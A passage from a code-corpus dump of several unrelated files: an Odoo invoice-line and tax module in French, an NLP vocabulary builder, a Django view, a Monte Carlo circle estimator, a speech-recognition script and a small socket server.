,compute=\"_compute_qte_aff\", store=True)\n    di_poin = fields.Float(string='Poids net' ,compute=\"_compute_qte_aff\", store=True)\n    di_poib = fields.Float(string='Poids brut', store=True)\n    di_tare = fields.Float(string='Tare', store=True)#,compute=\"_compute_tare\")\n    di_product_packaging_id = fields.Many2one('product.packaging', string='Package', default=False, store=True)\n    di_un_prix      = fields.Selection([(\"PIECE\", \"Pièce\"), (\"COLIS\", \"Colis\"),(\"PALETTE\", \"Palette\"),(\"KG\",\"Kg\")], string=\"Unité de prix\",store=True)\n    di_flg_modif_uom = fields.Boolean(default=False)\n    \n    di_spe_saisissable = fields.Boolean(string='Champs spé saisissables',default=False,compute='_di_compute_spe_saisissable',store=True)\n    \n    @api.multi\n    @api.onchange('di_type_palette_id','di_product_packaging_id','di_nb_colis','di_nb_palette')\n    def _compute_tare(self):        \n        self.di_tare = (self.di_type_palette_id.di_poids * self.di_nb_palette) + (self.di_product_packaging_id.di_poids * self.di_nb_colis)\n        \n    def di_recherche_prix_unitaire(self,prixOrig, tiers, article, di_un_prix , qte, date,typecol,typepal):    \n        prixFinal = 0.0       \n        prixFinal =self.env[\"di.tarifs\"]._di_get_prix(tiers,article,di_un_prix,qte,date,typecol,typepal)\n        if prixFinal == 0.0:\n            prixFinal = prixOrig\n#             if prixOrig == 0.0:\n#                 raise Warning(\"Le prix unitaire de la ligne est à 0 !\")\n        return prixFinal \n    \n    @api.multi\n    @api.depends('product_id.di_spe_saisissable')\n    def _di_compute_spe_saisissable(self):\n        for aol in self:        \n            aol.di_spe_saisissable =aol.product_id.di_spe_saisissable\n     \n \n # n'existe plus en v12\n#     @api.depends('price_unit', 'discount', 'invoice_line_tax_ids', 'quantity',\n#         'product_id', 'invoice_id.partner_id', 'invoice_id.currency_id', 'invoice_id.company_id',\n#         'invoice_id.date_invoice')\n#     def _compute_total_price(self):\n#         for line in self:\n#             # modif de la quantité à prendre en compte\n#             di_qte_prix = 0.0\n#             if line.di_un_prix == \"PIECE\":\n#                 di_qte_prix = line.di_nb_pieces\n#             elif line.di_un_prix == \"COLIS\":\n#                 di_qte_prix = line.di_nb_colis\n#             elif line.di_un_prix == \"PALETTE\":\n#                 di_qte_prix = line.di_nb_palette\n#             elif line.di_un_prix == \"KG\":\n#                 di_qte_prix = line.di_poin\n#             elif line.di_un_prix == False or line.di_un_prix == '':\n#                 di_qte_prix = line.quantity\n#             price = line.price_unit * (1 - (line.discount or 0.0) / 100.0)\n#             taxes = line.invoice_line_tax_ids.compute_all(price, line.invoice_id.currency_id, di_qte_prix, product=line.product_id, partner=line.invoice_id.partner_id)\n#             line.price_total = taxes['total_included']\n\n    \n    \n    @api.one # SC je garde api.one car c'est une copie du standard\n    @api.depends('price_unit', 'discount', 'invoice_line_tax_ids', 'quantity',\n        'product_id', 'invoice_id.partner_id', 'invoice_id.currency_id', 'invoice_id.company_id',\n        'invoice_id.date_invoice', 'invoice_id.date','di_qte_un_saisie','di_nb_pieces','di_nb_colis','di_nb_palette','di_poin','di_poib','di_tare','di_un_prix')\n    def _compute_price(self):\n        # copie standard\n        currency = self.invoice_id and self.invoice_id.currency_id or None\n        price = self.price_unit * (1 - (self.discount or 0.0) / 100.0)\n        taxes = False\n        \n        # modif de la quantité à prendre en compte \n        di_qte_prix = 0.0        \n        if self.di_un_prix == \"PIECE\":\n            di_qte_prix = self.di_nb_pieces\n        elif self.di_un_prix == \"COLIS\":\n            di_qte_prix = self.di_nb_colis\n        elif self.di_un_prix == \"PALETTE\":\n            di_qte_prix = self.di_nb_palette\n        elif self.di_un_prix == \"KG\":\n            di_qte_prix = self.di_poin\n        elif self.di_un_prix == False or self.di_un_prix == '':\n            di_qte_prix = self.quantity\n            \n        if self.invoice_line_tax_ids:\n            taxes = self.invoice_line_tax_ids.compute_all(price, currency, di_qte_prix, product=self.product_id, partner=self.invoice_id.partner_id)        \n        self.price_subtotal = price_subtotal_signed = taxes['total_excluded'] if taxes else di_qte_prix * price\n        self.price_total = taxes['total_included'] if taxes else self.price_subtotal\n        if self.invoice_id.currency_id and self.invoice_id.currency_id != self.invoice_id.company_id.currency_id:\n            currency = self.invoice_id.currency_id\n            date = self.invoice_id._get_currency_rate_date()\n            price_subtotal_signed = currency._convert(price_subtotal_signed, self.invoice_id.company_id.currency_id, self.company_id or self.env.user.company_id, date or fields.Date.today())\n        sign = self.invoice_id.type in ['in_refund', 'out_refund'] and -1 or 1\n        self.price_subtotal_signed = price_subtotal_signed * sign\n\n        \n    @api.multi\n    @api.onchange('product_id','invoice_id.partner_id','invoice_id.date','di_un_prix','di_qte_un_saisie','di_nb_pieces','di_nb_colis','di_nb_palette','di_poin','di_poib','di_tare','quantity')\n    def _di_changer_prix(self):\n        for line in self:\n            di_qte_prix = 0.0\n            if line.di_un_prix == \"PIECE\":\n                di_qte_prix = line.di_nb_pieces\n            elif line.di_un_prix == \"COLIS\":\n                di_qte_prix = line.di_nb_colis\n            elif line.di_un_prix == \"PALETTE\":\n                di_qte_prix = line.di_nb_palette\n            elif line.di_un_prix == \"KG\":\n                di_qte_prix = line.di_poin\n            elif line.di_un_prix == False or line.di_un_prix == '':\n                di_qte_prix = line.quantity             \n            if line.product_id.id != False and line.di_un_prix:       \n                line.price_unit = self.di_recherche_prix_unitaire(line.price_unit,line.invoice_id.partner_id,line.product_id,line.di_un_prix,di_qte_prix,line.invoice_id.date,line.product_packaging,line.di_type_palette_id)            \n     \n    @api.multi            \n    @api.onchange('product_id')\n    def _di_charger_valeur_par_defaut(self):\n        if self.ensure_one():\n            if self.partner_id and self.product_id:\n                ref = self.env['di.ref.art.tiers'].search([('di_partner_id','=',self.partner_id.id),('di_product_id','=',self.product_id.id)],limit=1)\n            else:\n                ref = False\n            if ref:\n                self.di_un_saisie = ref.di_un_saisie\n                self.di_type_palette_id = ref.di_type_palette_id\n                self.product_packaging = ref.di_type_colis_id    \n                self.di_un_prix = ref.di_un_prix    \n                self.di_spe_saisissable = self.product_id.di_spe_saisissable                  \n            else:\n                if self.product_id:\n                    self.di_un_saisie = self.product_id.di_un_saisie\n                    self.di_type_palette_id = self.product_id.di_type_palette_id\n                    self.product_packaging = self.product_id.di_type_colis_id    \n                    self.di_un_prix = self.product_id.di_un_prix    \n                    self.di_spe_saisissable = self.product_id.di_spe_saisissable                                    \n                \n                \n    @api.multi\n    @api.onchange('di_poib')\n    def _di_recalcule_tare(self):\n        if self.ensure_one():\n            self.di_tare = self.di_poib - self.di_poin            \n                 \n                 \n                 \n    @api.multi    \n    @api.onchange('quantity')\n    def _di_modif_qte_un_mesure(self):\n        if self.ensure_one():\n            if AccountInvoiceLine.modifparprg == False:\n                if self.uom_id:\n                    if self.uom_id.name.lower() == 'kg':\n                        self.di_poin=self.quantity * self.product_id.weight\n                        self.di_poib = self.di_poin + self.di_tare\n                    elif self.uom_id.name.lower() != 'kg':    \n                        if self.product_id.di_get_type_piece().qty != 0.0:\n                            self.di_nb_pieces = ceil(self.quantity/self.product_id.di_get_type_piece().qty)\n                        else:\n                            self.di_nb_pieces = ceil(self.quantity)                                \n                        if self.di_product_packaging_id.qty != 0.0 :\n                            self.di_nb_colis = ceil(self.quantity / self.di_product_packaging_id.qty)\n                        else:      \n                            self.di_nb_colis = ceil(self.quantity)             \n                        if self.di_type_palette_id.di_qte_cond_inf != 0.0:\n                            self.di_nb_palette = self.di_nb_colis / self.di_type_palette_id.di_qte_cond_inf\n                        else:\n                            self.di_nb_palette = self.di_nb_colis\n                        self.di_poin = self.quantity * self.product_id.weight \n                        self.di_poib = self.di_poin + self.di_tare\n                    self.di_flg_modif_uom = True\n            AccountInvoiceLine.modifparprg=False\n            \n            \n    @api.multi            \n    @api.onchange('di_qte_un_saisie', 'di_un_saisie', 'di_type_palette_id', 'di_tare', 'di_product_packaging_id')\n    def _di_recalcule_quantites(self):\n        if self.ensure_one():\n            if self.di_flg_modif_uom == False:\n                if self.di_un_saisie == \"PIECE\":\n                    self.di_nb_pieces = ceil(self.di_qte_un_saisie)\n                    self.quantity = self.product_id.di_get_type_piece().qty * self.di_nb_pieces\n                    if self.di_product_packaging_id.qty != 0.0 :\n                        self.di_nb_colis = ceil(self.quantity / self.di_product_packaging_id.qty)\n                    else:      \n                        self.di_nb_colis = ceil(self.quantity)             \n                    if self.di_type_palette_id.di_qte_cond_inf != 0.0:\n                        self.di_nb_palette = self.di_nb_colis / self.di_type_palette_id.di_qte_cond_inf\n                    else:\n                        self.di_nb_palette = self.di_nb_colis\n                    self.di_poin = self.quantity * self.product_id.weight \n                    self.di_poib = self.di_poin + self.di_tare\n                           \n                elif self.di_un_saisie == \"COLIS\":\n                    self.di_nb_colis = ceil(self.di_qte_un_saisie)\n                    self.quantity = self.di_product_packaging_id.qty * self.di_nb_colis\n                    self.di_nb_pieces = ceil(self.di_product_packaging_id.di_qte_cond_inf * self.di_nb_colis)\n                    if self.di_type_palette_id.di_qte_cond_inf != 0.0:                \n                        self.di_nb_palette = self.di_nb_colis / self.di_type_palette_id.di_qte_cond_inf\n                    else:\n                        self.di_nb_palette = self.di_nb_colis\n                    self.di_poin = self.quantity * self.product_id.weight \n                    self.di_poib = self.di_poin + self.di_tare\n                                          \n                elif self.di_un_saisie == \"PALETTE\":            \n                    self.di_nb_palette = self.di_qte_un_saisie\n                    if self.di_type_palette_id.di_qte_cond_inf != 0.0:\n                        self.di_nb_colis = ceil(self.di_nb_palette * self.di_type_palette_id.di_qte_cond_inf)\n                    else:\n                        self.di_nb_colis = ceil(self.di_nb_palette)\n                    self.di_nb_pieces = ceil(self.di_product_packaging_id.di_qte_cond_inf * self.di_nb_colis)\n                    self.quantity = self.di_product_packaging_id.qty * self.di_nb_colis\n                    self.di_poin = self.quantity * self.product_id.weight \n                    self.di_poib = self.di_poin + self.di_tare\n                     \n                elif self.di_un_saisie == \"KG\":\n                    self.di_poin = self.di_qte_un_saisie\n                    self.di_poib = self.di_poin + self.di_tare\n                    self.quantity = self.di_poin\n                    if self.di_product_packaging_id.qty != 0.0:\n                        self.di_nb_colis = ceil(self.quantity / self.di_product_packaging_id.qty)\n                    else:\n                        self.di_nb_colis = ceil(self.quantity)\n                    if self.di_type_palette_id.di_qte_cond_inf != 0.0:    \n                        self.di_nb_palette = self.di_nb_colis / self.di_type_palette_id.di_qte_cond_inf\n                    else:  \n                        self.di_nb_palette = self.di_nb_colis\n                    self.di_nb_pieces = ceil(self.di_product_packaging_id.di_qte_cond_inf * self.di_nb_colis)\n                     \n                else:\n                    self.di_poin = self.di_qte_un_saisie\n                    self.di_poib = self.di_poin + self.di_tare\n                    self.quantity = self.di_poin\n                    if self.di_product_packaging_id.qty != 0.0:\n                        self.di_nb_colis = ceil(self.quantity / self.di_product_packaging_id.qty)\n                    else:\n                        self.di_nb_colis = ceil(self.quantity)\n                    if self.di_type_palette_id.di_qte_cond_inf != 0.0:    \n                        self.di_nb_palette = self.di_nb_colis / self.di_type_palette_id.di_qte_cond_inf\n                    else:  \n                        self.di_nb_palette = self.di_nb_colis\n                    self.di_nb_pieces = ceil(self.di_product_packaging_id.di_qte_cond_inf * self.di_nb_colis)\n                    \n    @api.multi\n    @api.depends('di_qte_un_saisie', 'di_un_saisie', 'di_type_palette_id', 'di_tare', 'di_product_packaging_id')\n    def _compute_qte_aff(self):\n        #recalcule des quantités non modifiables pour qu'elles soient enregistrées même si on met en readonly dans les masques.\n        for aol in self:\n            if aol.di_flg_modif_uom == False:        \n                if aol.di_un_saisie == \"PIECE\":\n                    aol.di_nb_pieces = ceil(aol.di_qte_un_saisie)            \n                    if aol.di_product_packaging_id.qty != 0.0 :\n                        aol.di_nb_colis = ceil(aol.quantity / aol.di_product_packaging_id.qty)\n                    else:      \n                        aol.di_nb_colis = ceil(aol.quantity)             \n                    if aol.di_type_palette_id.di_qte_cond_inf != 0.0:\n                        aol.di_nb_palette = aol.di_nb_colis / aol.di_type_palette_id.di_qte_cond_inf\n                    else:\n                        aol.di_nb_palette = aol.di_nb_colis\n                    aol.di_poin = aol.quantity * aol.product_id.weight             \n                            \n                elif aol.di_un_saisie == \"COLIS\":\n                    aol.di_nb_colis = ceil(aol.di_qte_un_saisie)            \n                    aol.di_nb_pieces = ceil(aol.di_product_packaging_id.di_qte_cond_inf * aol.di_nb_colis)\n                    if aol.di_type_palette_id.di_qte_cond_inf != 0.0:                \n                        aol.di_nb_palette = aol.di_nb_colis / aol.di_type_palette_id.di_qte_cond_inf\n                    else:\n                        aol.di_nb_palette = aol.di_nb_colis\n                    aol.di_poin = aol.quantity * aol.product_id.weight             \n                                           \n                elif aol.di_un_saisie == \"PALETTE\":            \n                    aol.di_nb_palette = aol.di_qte_un_saisie\n                    if aol.di_type_palette_id.di_qte_cond_inf != 0.0:\n                        aol.di_nb_colis = ceil(aol.di_nb_palette / aol.di_type_palette_id.di_qte_cond_inf)\n                    else:\n                        aol.di_nb_colis = ceil(aol.di_nb_palette)\n                    aol.di_nb_pieces = ceil(aol.di_product_packaging_id.di_qte_cond_inf * aol.di_nb_colis)            \n                    aol.di_poin = aol.quantity * aol.product_id.weight             \n                      \n                elif aol.di_un_saisie == \"KG\":\n                    aol.di_poin = aol.di_qte_un_saisie                        \n                    if aol.di_product_packaging_id.qty != 0.0:\n                        aol.di_nb_colis = ceil(aol.quantity / aol.di_product_packaging_id.qty)\n                    else:\n                        aol.di_nb_colis = ceil(aol.quantity)\n                    if aol.di_type_palette_id.di_qte_cond_inf != 0.0:    \n                        aol.di_nb_palette = aol.di_nb_colis / aol.di_type_palette_id.di_qte_cond_inf\n                    else:  \n                        aol.di_nb_palette = aol.di_nb_colis\n                    aol.di_nb_pieces = ceil(aol.di_product_packaging_id.di_qte_cond_inf * aol.di_nb_colis)\n                      \n                else:\n                    aol.di_poin = aol.di_qte_un_saisie            \n                    aol.quantity = aol.di_poin\n                    if aol.di_product_packaging_id.qty != 0.0:\n                        aol.di_nb_colis = ceil(aol.quantity / aol.di_product_packaging_id.qty)\n                    else:\n                        aol.di_nb_colis = ceil(aol.quantity)\n                    if aol.di_type_palette_id.di_qte_cond_inf != 0.0:    \n                        aol.di_nb_palette = aol.di_nb_colis / aol.di_type_palette_id.di_qte_cond_inf\n                    else:  \n                        aol.di_nb_palette = aol.di_nb_colis\n                    aol.di_nb_pieces = ceil(aol.di_product_packaging_id.di_qte_cond_inf * aol.di_nb_colis) \n            else:           \n                if aol.product_id.di_get_type_piece().qty != 0.0:\n                    aol.di_nb_pieces = ceil(aol.quantity/aol.product_id.di_get_type_piece().qty)\n                else:\n                    aol.di_nb_pieces = ceil(aol.quantity)                                \n                if aol.di_product_packaging_id.qty != 0.0 :\n                    aol.di_nb_colis = ceil(aol.quantity / aol.di_product_packaging_id.qty)\n                else:      \n                    aol.di_nb_colis = ceil(aol.quantity)             \n                if aol.di_type_palette_id.di_qte_cond_inf != 0.0:\n                    aol.di_nb_palette = aol.di_nb_colis / aol.di_type_palette_id.di_qte_cond_inf\n                else:\n                    aol.di_nb_palette = aol.di_nb_colis\n                aol.di_poin = aol.quantity * aol.product_id.weight \n                aol.di_poib = aol.di_poin + aol.di_tare\n               \n    @api.model\n    def create(self, vals):               \n        di_avec_sale_line_ids = False  # initialisation d'une variable       \n        di_ctx = dict(self._context or {})  # chargement du contexte\n        for key in vals.items():  # vals est un dictionnaire qui contient les champs modifiés, on va lire les différents enregistrements                      \n            if key[0] == \"sale_line_ids\":  # si on a modifié sale_line_id\n                di_avec_sale_line_ids = True\n        if di_avec_sale_line_ids == True:\n            qte_a_fac = 0.0\n            poib = 0.0\n            for id_ligne in vals[\"sale_line_ids\"][0][2]:\n                Disaleorderline = self.env['sale.order.line'].search([('id', '=', id_ligne)], limit=1)                                 \n                if Disaleorderline.id != False:               \n                    #on attribue par défaut les valeurs de la ligne de commande   \n                    vals[\"di_tare\"] = Disaleorderline.di_tare  \n                    vals[\"di_un_saisie\"] = Disaleorderline.di_un_saisie\n                    vals[\"di_type_palette_id\"] = Disaleorderline.di_type_palette_id.id\n                    vals[\"di_product_packaging_id\"] = Disaleorderline.product_packaging.id \n                    vals[\"di_un_prix\"] = Disaleorderline.di_un_prix\n                    vals[\"di_flg_modif_uom\"]=Disaleorderline.di_flg_modif_uom\n                    qte_a_fac += Disaleorderline.di_qte_a_facturer_un_saisie   \n                    poib += Disaleorderline.di_poib\n                     \n            vals[\"di_qte_un_saisie\"] = qte_a_fac\n            vals[\"di_poib\"] = poib            \n            \n        di_avec_purchase_line_ids = False  # initialisation d'une variable       \n        di_ctx = dict(self._context or {})  # chargement du contexte\n        for key in vals.items():  # vals est un dictionnaire qui contient les champs modifiés, on va lire les différents enregistrements                      \n            if key[0] == \"purchase_line_ids\":  # si on a modifié sale_line_id\n                di_avec_purchase_line_ids = True\n        if di_avec_purchase_line_ids == True:\n            qte_a_fac = 0.0\n            poib = 0.0\n            for id_ligne in vals[\"purchase_line_ids\"][0][2]:\n                Dipurchaseorderline = self.env['purchase.order.line'].search([('id', '=', id_ligne)], limit=1)                                 \n                if Dipurchaseorderline.id != False:               \n                    #on attribue par défaut les valeurs de la ligne de commande   \n                    vals[\"di_tare\"] = Dipurchaseorderline.di_tare  \n                    vals[\"di_un_saisie\"] = Dipurchaseorderline.di_un_saisie\n                    vals[\"di_type_palette_id\"] = Dipurchaseorderline.di_type_palette_id.id\n                    vals[\"di_product_packaging_id\"] = Dipurchaseorderline.product_packaging.id \n                    vals[\"di_un_prix\"] = Dipurchaseorderline.di_un_prix\n                    qte_a_fac += Dipurchaseorderline.di_qte_un_saisie   \n                    poib += Dipurchaseorderline.di_poib\n                     \n            vals[\"di_qte_un_saisie\"] = qte_a_fac\n            vals[\"di_poib\"] = poib\n  \n        res = super(AccountInvoiceLine, self).create(vals)                           \n        return res\n\n\n\nclass AccountTax(models.Model):\n    _inherit = 'account.tax'\n        \n    di_taxe_id = fields.Many2one('account.tax', string='Taxe sur la taxe',help=\"\"\"Permet par exemple d'affecter de la TVA sur l'interfel \"\"\")\n    \n    @api.multi\n    def compute_all(self, price_unit, currency=None, quantity=1.0, product=None, partner=None):\n        # copie standard\n        \"\"\" Returns all information required to apply taxes (in self + their children in case of a tax goup).\n            We consider the sequence of the parent for group of taxes.\n                Eg. considering letters as taxes and alphabetic order as sequence :\n                [G, B([A, D, F]), E, C] will be computed as [A, D, F, C, E, G]\n\n        RETURN: {\n            'total_excluded': 0.0,    # Total without taxes\n            'total_included': 0.0,    # Total with taxes\n            'taxes': [{               # One dict for each tax in self and their children\n                'id': int,\n                'name': str,\n                'amount': float,\n                'sequence': int,\n                'account_id': int,\n                'refund_account_id': int,\n                'analytic': boolean,\n            }]\n        } \"\"\"\n        if len(self) == 0:\n            company_id = self.env.user.company_id\n        else:\n            company_id = self[0].company_id\n        if not currency:\n            currency = company_id.currency_id\n        taxes = []\n        # By default, for each tax, tax amount will first be computed\n        # and rounded at the 'Account' decimal precision for each\n        # PO/SO/invoice line and then these rounded amounts will be\n        # summed, leading to the total amount for that tax. But, if the\n        # company has tax_calculation_rounding_method = round_globally,\n        # we still follow the same method, but we use a much larger\n        # precision when we round the tax amount for each line (we use\n        # the 'Account' decimal precision + 5), and that way it's like\n        # rounding after the sum of the tax amounts of each line\n        prec = currency.decimal_places\n\n        # In some cases, it is necessary to force/prevent the rounding of the tax and the total\n        # amounts. For example, in SO/PO line, we don't want to round the price unit at the\n        # precision of the currency.\n        # The context key 'round' allows to force the standard behavior.\n        round_tax = False if company_id.tax_calculation_rounding_method == 'round_globally' else True\n        round_total = True\n        if 'round' in self.env.context:\n            round_tax = bool(self.env.context['round'])\n            round_total = bool(self.env.context['round'])\n\n        if not round_tax:\n            prec += 5\n\n        base_values = self.env.context.get('base_values')\n        if not base_values:\n            total_excluded = total_included = base = round(price_unit * quantity, prec)\n        else:\n            total_excluded, total_included, base = base_values\n\n        # Sorting key is mandatory in this case. When no key is provided, sorted() will perform a\n        # search. However, the search method is overridden in account.tax in order to add a domain\n        # depending on the context. This domain might filter out some taxes from self, e.g. in the\n        # case of group taxes.\n        \n        for tax in self.sorted(key=lambda r: r.sequence):\n            price_include = self._context.get('force_price_include', tax.price_include)\n            if tax.amount_type == 'group':\n                children = tax.children_tax_ids.with_context(base_values=(total_excluded, total_included, base))\n                ret = children.compute_all(price_unit, currency, quantity, product, partner)\n                total_excluded = ret['total_excluded']\n                base = ret['base'] if tax.include_base_amount else base\n                total_included = ret['total_included']\n                tax_amount = total_included - total_excluded\n                taxes += ret['taxes']\n                continue\n\n            tax_amount = tax._compute_amount(base, price_unit, quantity, product, partner)\n            if not round_tax:\n                tax_amount = round(tax_amount, prec)\n            else:\n                tax_amount = currency.round(tax_amount)\n\n            if price_include:\n                total_excluded -= tax_amount\n                base -= tax_amount\n            else:\n                total_included += tax_amount\n\n            # Keep base amount used for the current tax\n            tax_base = base\n\n            if tax.include_base_amount:\n                base += tax_amount\n\n            taxes.append({\n                'id': tax.id,\n                'name': tax.with_context(**{'lang': partner.lang} if partner else {}).name,\n                'amount': tax_amount,\n                'base': tax_base,\n                'sequence': tax.sequence,\n                'account_id': tax.account_id.id,\n                'refund_account_id': tax.refund_account_id.id,\n                'analytic': tax.analytic,\n                'price_include': tax.price_include, \n                'tax_exigibility': tax.tax_exigibility,               \n            })\n             \n            # spé pour affecter une taxe sur une autre taxe\n            if tax.di_taxe_id:\n                di_tax_amount = tax.di_taxe_id._compute_amount(tax_amount, tax_amount, 1.0, product, partner)\n                if not round_tax:\n                    di_tax_amount = round(di_tax_amount, prec)\n                else:\n                    di_tax_amount = currency.round(di_tax_amount)                \n                taxes.append({\n                    'id': tax.di_taxe_id.id,\n                    'name': tax.di_taxe_id.with_context(**{'lang': partner.lang} if partner else {}).name,\n                    'amount': di_tax_amount,\n                    'base': tax_amount,\n                    'sequence': tax.di_taxe_id.sequence,\n                    'account_id': tax.di_taxe_id.account_id.id,\n                    'refund_account_id': tax.di_taxe_id.refund_account_id.id,\n                    'analytic': tax.di_taxe_id.analytic,\n                    'price_include': tax.di_taxe_id.price_include, \n                    'tax_exigibility': tax.di_taxe_id.tax_exigibility,                   \n                })\n                \n                #fin spé\n                \n\n        return {\n            'taxes': sorted(taxes, key=lambda k: k['sequence']),\n            'total_excluded': currency.round(total_excluded) if round_total else total_excluded,\n            'total_included': currency.round(total_included) if round_total else total_included,\n            'base': base,\n        }","sub_path":"addons_gesprim/difodoo_ventes/models/di_inherited_account_invoice.py","file_name":"di_inherited_account_invoice.py","file_ext":"py","file_size_in_byte":35398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"213141907","text":"\"\"\"\nconstruct dictionary\n\"\"\"\nfrom nltk import word_tokenize\nfrom collections import Counter\nimport pickle\n\n\ndef readWikiVocab(fn=\"vocab.txt\"):\n    with open(fn, 'r') as input_file:\n        cnt = Counter()\n        for line in input_file:\n            word, freq = line.strip().split()\n            cnt[word] += int(freq)\n    return cnt\n\n\ndef pythonTokenizeText(fn, output_fn):\n    with open(fn, 'r') as input_file:\n        tok_lines = []\n        for line in input_file:\n            tok_seq = word_tokenize(line.strip().lower().decode('utf8'))\n            tok_line = ' '.join(tok_seq)\n            tok_lines.append(tok_line)\n\n    with open(output_fn, 'w') as output_file:\n        tok_text = '\\n'.join(tok_lines)\n        print(tok_text.encode(\"utf8\"), file=output_file)\n    print('done processing train text...')\n\n\ndef dumpDict(fn='tok_train.txt'):\n    \"\"\"\n    dict: words in lower case\n    \"\"\"\n    # word from wikipedia\n    cnt = readWikiVocab()\n\n    # word from perspective data\n    with open(fn, 'r') as input_file:\n        text = input_file.read()\n        text_seq = text.split()\n        for word in text_seq:\n            cnt[word] += 1\n\n    # dump dictionary\n    with open('dict.pickle', 'wb') as handle:\n        pickle.dump(cnt, handle)\n    print('done dumping the vocabulary...')\n\n\ndef loadDict(fn='vocab.txt', freq_threshold=6):\n    with open(fn, 'r') as handle:\n        cnt = dict(list(map(lambda x: (x.split()[0], int(x.split()[1])), handle.readlines())))\n        rare_words = [word for word in cnt if cnt[word] < freq_threshold]\n    for word in rare_words:\n        cnt.pop(word)\n    print('done loading dictionary...')\n    return cnt\n\n\ndef sanityCheck(cnt_dump='dict.pickle', test_fn='tok_test.txt'):\n    cnt = loadDict(cnt_dump)\n\n    with open(test_fn, 'r') as input_file:\n        text = input_file.read()\n        text_seq = text.split()\n\n    with open('missing_words.txt', 'w') as output_file:\n        for word in text_seq:\n            if word not in cnt:\n                print(word, file=input_file)\n    print('done sanity check...')\n","sub_path":"context_based_selection/corpus_util.py","file_name":"corpus_util.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"126378868","text":"# Create your views here.\nfrom django.shortcuts import render\n\nfrom merch.models import Merch\n\n\ndef product_detail(request, merch_slug):\n    merch = Merch.objects.get(slug=merch_slug)\n    context = {\n        'merch': merch,\n    }\n    return render(request, 'merch/merch_detail.html', context)\n","sub_path":"merch/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"330003477","text":"def run_formula(dv, param = None):\n    defult_param = {'t1':1,'t2':1,'t3':5}\n    if not param:\n        param = defult_param\n        \n\n\n    alpha1 = dv.add_formula('alpha1', \n                         \"-If(net_profit>Delay(net_profit,%s),Delay(turnover_ratio,%s),Ts_Max(turnover_ratio,%s))\"%(param['t1'],param['t2'],param['t3'])\n                        , is_quarterly=False, add_data=True)\n\n\n    return alpha1\n","sub_path":"factor2/alpha1.py","file_name":"alpha1.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"610724674","text":"from math import pi, fabs\nfrom random import random\n\nclass Circle:\n\n    POINTS = 10\n\n    def __init__(self, radius):\n        self.radius = radius\n        self.area = radius*radius * pi\n\n    def monte_carlo(self, iteration):\n        num_area = 0\n\n        for _ in range(Circle.POINTS**iteration):\n            if (self.radius*random())**2 + (self.radius*random())**2 < self.radius**2:\n                num_area += self.radius**2\n\n        # divide by Circle.POINTS to get the probability and multiply by 4 because we only integrate one quadrant\n        num_area = num_area/(Circle.POINTS**iteration)*4\n        error = fabs(self.area-num_area)/num_area\n\n        print(\"Points: 10^\" + str(iteration) + \" \" + str(self.area) + \" - \" + str(num_area) + \" - Error: \" + str(error*100))\n\n\nif __name__==  \"__main__\":\n    circle = Circle(4)\n\n    iteration = 1\n    while True:\n        circle.monte_carlo(iteration)\n        iteration += 1\n\n","sub_path":"circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"52381090","text":"from ScopeFoundry import LQCollection, BaseApp\n\nclass LQConnectionTestApp(BaseApp):\n    \n    name = 'LQConnectionTestApp'\n\n    def __init__(self,argv):\n        BaseApp.__init__(self,argv)\n        \n        lq1 = self.settings.New('lq1', dtype=float,ro=False, initial=5)\n        lq2 = self.settings.New('lq2', dtype=float,ro=False, initial=35)\n\n        lq1.connect_to_lq(lq2)\n        \n        self.ui = self.settings.New_UI()\n        \n        self.ui.show()\n        self.console_widget.show()\n        \n        \nif __name__ == '__main__':\n    app = LQConnectionTestApp([])\n    app.exec_()","sub_path":"tests/lq_connection_test.py","file_name":"lq_connection_test.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"70635462","text":"#!/usr/bin/env python\n\nimport speech_recognition as sr\nfrom termcolor import colored as color\nimport apiai\nimport json\nfrom os import system\nimport wikipedia as wiki\nfrom time import sleep\nimport webbrowser as wb\n\n\nBOLD = \"\\033[1m\"   #use to bold the text\nEND = \"\\033[0m\"    #use to close the bold text\nCLIENT_ACCESS_TOKEN = \"2245d4ab7c99466e806c8986a18234c4\"\nai = apiai.ApiAI(CLIENT_ACCESS_TOKEN)\n\ngoogle_search = \"https://www.google.com/search?q=\"\nyoutube_search = \"https://www.youtube.com/results?search_query=\"\ngoogle_drive = \"https://drive.google.com\"\ngmail = \"https://mail.google.com\"\ntry:\n    r = sr.Recognizer()\n    with sr.Microphone() as source:\n        system(\"clear\")\n        print(color(BOLD+\"Hola!\\nAsk me anything.\"+END,\"green\"))\n        while True:\n            audio = r.listen(source)\n\n#       while True:     \n            try:\n                query = r.recognize_google(audio)\n                print(query)\n            except sr.UnknownValueError:\n                print (color(\"Listening\",\"blue\"))\n\n\n   \n\nexcept KeyboardInterrupt:\n    print (color(BOLD+\" Bye!\"+END, \"cyan\"))\n","sub_path":"stt.py","file_name":"stt.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"531250395","text":"# coding = utf-8\nimport socket\n\ns = socket.socket()  # 创建 socket 对象\nhost = socket.gethostname()  # 获取本地主机名\nport = 12345  # 设置端口\ns.bind((host, port))  # 绑定端口\ns.listen(5)  # 等待客户端连接\nwhile True:\n\tc, addr = s.accept()  # 建立客户端连接。\n\tprint('连接地址:', addr)\n\tc.send(bytes(\"连接成功\", \"utf-8\"))\n\tc.close()  # 关闭连接\n","sub_path":"day01_01/服务端.py","file_name":"服务端.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
